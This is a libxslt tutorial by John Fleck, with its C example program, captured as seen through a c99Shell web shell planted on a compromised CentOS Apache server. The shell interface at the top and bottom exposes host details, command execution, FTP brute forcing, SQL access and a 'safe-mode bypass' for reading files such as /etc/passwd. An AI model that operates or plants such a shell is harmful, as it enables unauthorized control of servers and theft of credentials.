!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/libxslt-1.1.17/tutorial/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     libxslttutorial.html (15.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
libxslt Tutorial

libxslt Tutorial

John Fleck

This is version 0.4 of the libxslt Tutorial

Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.1 or any later version published by the Free Software Foundation with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license can be found here.


Abstract

A tutorial on building a simple application using the libxslt library to perform XSLT transformations to convert an XML file into HTML.

Introduction

The Extensible Markup Language (XML) is a World Wide Web Consortium standard for the exchange of structured data in text form. Its popularity stems from its universality. Any computer can read a text file. With the proper tools, any computer can read any other computer's XML files.

One of the most important of those tools is XSLT: Extensible Stylesheet Language Transformations. XSLT is a declarative language that allows you to translate your XML into arbitrary text output using a stylesheet. libxslt provides the functions to perform the transformation.

libxslt is a free C language library written by Daniel Veillard for the GNOME project allowing you to write programs that perform XSLT transformations.

Note

While libxslt was written under the auspices of the GNOME project, it does not depend on any GNOME libraries. None are used in the example in this tutorial.

This tutorial illustrates a simple program that reads an XML file, applies a stylesheet and saves the resulting output. This is not a program you would want to create yourself. xsltproc, which is included with the libxslt package, does the same thing and is more robust and full-featured. The program written for this tutorial is a stripped-down version of xsltproc designed to illustrate the functionality of libxslt.

The full code for xsltproc is in xsltproc.c in the libxslt distribution. It also is available on the web.

References:

Primary Functions

To transform an XML file, you must perform three functions:

  1. parse the input file

  2. parse the stylesheet

  3. apply the stylesheet

Preparing to Parse

Before you can begin parsing input files or stylesheets, there are several steps you need to take to set up entity handling. These steps are not unique to libxslt. Any libxml2 program that parses XML files would need to take similar steps.

First, you need set up some libxml housekeeping. Pass the integer value 1 to the xmlSubstituteEntitiesDefault function, which tells the libxml2 parser to substitute entities as it parses your file. (Passing 0 causes libxml2 to not perform entity substitution.)

Second, set xmlLoadExtDtdDefaultValue equal to 1. This tells libxml to load external entity subsets. If you do not do this and your input file includes entities through external subsets, you will get errors.

Parse the Stylesheet

Parsing the stylesheet takes a single function call, which takes a variable of type xmlChar:

	  cur = xsltParseStylesheetFile((const xmlChar *)argv[i]);
	
In this case, I cast the stylesheet file name, passed in as a command line argument, to xmlChar. The return value is of type xsltStylesheetPtr, a struct in memory that contains the stylesheet tree and other information about the stylesheet. It can be manipulated directly, but for this example you will not need to.

Parse the Input File

Parsing the input file takes a single function call:

doc = xmlParseFile(argv[i]);
	
It returns an xmlDocPtr, a struct in memory that contains the document tree. It can be manipulated directly, but for this example you will not need to.

Applying the Stylesheet

Now that you have trees representing the document and the stylesheet in memory, apply the stylesheet to the document. The function that does this is xsltApplyStylesheet:

res = xsltApplyStylesheet(cur, doc, params);
	
The function takes an xsltStylesheetPtr and an xmlDocPtr, the values returned by the previous two functions. The third variable, params can be used to pass XSLT parameters to the stylesheet. It is a NULL-terminated array of name/value pairs of const char's.

Saving the result

libxslt includes a family of functions to use in saving the resulting output. For this example, xsltSaveResultToFile is used, and the results are saved to stdout:

xsltSaveResultToFile(stdout, res, cur);
	

Note

libxml also contains output functions, such as xmlSaveFile, which can be used here. However, output-related information contained in the stylesheet, such as a declaration of the encoding to be used, will be lost if one of the libxslt save functions is not used.

Parameters

In XSLT, parameters may be used as a way to pass additional information to a stylesheet. libxslt accepts XSLT parameters as one of the values passed to xsltApplyStylesheet.

In the tutorial example and in xsltproc, on which the tutorial example is based, parameters to be passed take the form of key-value pairs. The program collects them from command line arguments, inserting them in the array params, then passes them to the function. The final element in the array is set to NULL.

Note

If a parameter being passed is a string rather than an XSLT node, it must be escaped. For the tutorial program, that would be done as follows: tutorial]$ ./libxslt_tutorial --param rootid "'asect1'" stylesheet.xsl filename.xml

Cleanup

After you are finished, libxslt and libxml provide functions for deallocating memory.

	  xsltFreeStylesheet(cur);1
	  xmlFreeDoc(res);2
	  xmlFreeDoc(doc);3
	  xsltCleanupGlobals();4
	  xmlCleanupParser();5

	  
1

Free the memory used by your stylesheet.

2

Free the memory used by the results document.

3

Free the memory used by your original document.

4

Free memory used by libxslt global variables

5

Free memory used by the XML parser

A. The Code

libxslt_tutorial.c

/*
 * libxslt_tutorial.c: demo program for the XSL Transformation 1.0 engine
 *
 * based on xsltproc.c, by Daniel.Veillard@imag.fr
 * by John Fleck 
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc.,  59 Temple Place - Suite 330, Cambridge, MA 02139, USA.
 *
 */ 

#include <string.h>
#include <libxml/xmlmemory.h>
#include <libxml/debugXML.h>
#include <libxml/HTMLtree.h>
#include <libxml/xmlIO.h>
#include <libxml/DOCBparser.h>
#include <libxml/xinclude.h>
#include <libxml/catalog.h>
#include <libxslt/xslt.h>
#include <libxslt/xsltInternals.h>
#include <libxslt/transform.h>
#include <libxslt/xsltutils.h>



extern int xmlLoadExtDtdDefaultValue;

static void usage(const char *name) {
    printf("Usage: %s [options] stylesheet file [file ...]\n", name);
    printf("      --param name value : pass a (parameter,value) pair\n");

}

int
main(int argc, char **argv) {
	int i;
	const char *params[16 + 1];
	int nbparams = 0;
	xsltStylesheetPtr cur = NULL;
	xmlDocPtr doc, res;

	if (argc <= 1) {
		usage(argv[0]);
		return(1);
	}
	

 for (i = 1; i < argc; i++) {
        if (argv[i][0] != '-')
            break;
	if ((!strcmp(argv[i], "-param")) ||
                   (!strcmp(argv[i], "--param"))) {
		i++;
		params[nbparams++] = argv[i++];
		params[nbparams++] = argv[i];
		if (nbparams >= 16) {
			fprintf(stderr, "too many params\n");
			return (1);
		}
        }  else {
            fprintf(stderr, "Unknown option %s\n", argv[i]);
            usage(argv[0]);
            return (1);
        }
    }

	params[nbparams] = NULL;
	xmlSubstituteEntitiesDefault(1);
	xmlLoadExtDtdDefaultValue = 1;
	cur = xsltParseStylesheetFile((const xmlChar *)argv[i]);
	i++;
	doc = xmlParseFile(argv[i]);
	res = xsltApplyStylesheet(cur, doc, params);
	xsltSaveResultToFile(stdout, res, cur);

	xsltFreeStylesheet(cur);
	xmlFreeDoc(res);
	xmlFreeDoc(doc);

        xsltCleanupGlobals();
        xmlCleanupParser();
	return(0);

}


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0127 ]--